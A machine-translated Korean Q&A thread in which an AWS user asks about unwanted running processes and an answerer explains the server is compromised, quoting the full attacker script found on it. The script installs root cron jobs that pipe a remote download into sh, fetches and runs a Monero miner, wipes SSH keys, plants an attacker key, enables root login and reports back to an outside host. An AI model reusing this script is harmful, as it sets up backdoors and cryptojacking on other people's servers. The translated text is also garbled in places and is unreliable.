-1
aws와 지난 며칠간 불필요한 스크립트가 실행되는 것을보고 있습니다. 다음은 첨부 된 스크린 샷입니다.AWS 불필요한 스크립트
나는 sudo kill -9 {pId}에 의해 그 프로세스를 죽이려했으나 그렇게 할 수 없었다.
A
답변
4
귀하의 상자가 손상있어 모든 suggesstion.
그것은 서버에 스크립트를 다운로드하고 당신이 모든 SSH 키를 삭제하고 공격자가 로그인 할 수있는 새로운 하나를 만들어 볼 수 있듯이 그것을
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
를 실행합니다. 스크립트의 끝에서
그것은 그것의 상태를보고 curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch= UNAME -i`
그들은 모두 내가
편집 생각 한 번에 서버를 손상 보일 수 있도록 다시 서버 : 도메인 인을 파나마에 등록했다. 우ie. 나는 당신이 당신의 서버를 점검하고 그것의 보안과 관련하여 조언을 받아야한다고 생각한다.
+0
당신 말이 맞아요. 그래서 내가 무엇을해야하니? 그들이 어떻게 그렇게 했습니까? –
+0
당신의 서버에서 이것을 얻기 위해 사용했던 것을 말할 수는 없지만, 백도어가 설치된 어떤 서비스이거나 시스템 자체에 취약점이 있습니다 – KRONWALLED
+0
어떻게 멈추게합니까? 어떤 아이디어? 또는 어디에서 설치 했습니까? –
관련 문제
- 1. AWS 서버에서 스크립트 실행
- 2. Amazon AWS 용 Dockerfile 스크립트
- 3. 불필요한 공백 제거 - "불필요한"키 사용
- 4. 스크립트에서 불필요한 ROI 절약
- 5. 불필요한 자료는
- 6. 불필요한 할당
- 7. 불필요한 쉼표
- 8. 방지 불필요한
- 9. 불필요한 대시
- 10. AWS API 자격 증명을 삽입하는 스크립트
- 11. AWS Elastic Beanstalk에서 ad-hoc 스크립트 실행
- 12. WP의 불필요한 페이지에 스크립트를 등록하십시오.
- 13. 어떤 소스 코드가 불필요한 지 빨리 결정하는 스크립트
- 14. 불필요한 캐시 지우기를 방지하기 위해 자바 스크립트 파일 버전 지정
- 15. , AWS
- 16. AWS
- 17. AWS
- 18. AWS
- 19. AWS
- 20. AWS
- 21. JavaScript를 사용하여 불필요한 JavaScript 제거
- 22. 웹 응용 프로그램 : 불필요한/불필요한 쿼리 문자열 인수는 무시해야합니까?
- 23. 불필요한 이벤트 처리기를 추가합니까?
- 24. 불필요한 텍스트가있는 NSURL 문제?
- 25. 공간 불필요한 레이아웃과 이미지
- 26. 불필요한 CSS 및 최적화
- 27. 불필요한 이미지/스프라이트
- 28. Antlr 불필요한 조건이 필요합니까?
- 29. 불필요한 "0"입력 표시
- 30. FileDialog에 불필요한 생성자가 있습니까?
SSH 키를 사용하고 있지 않습니까? –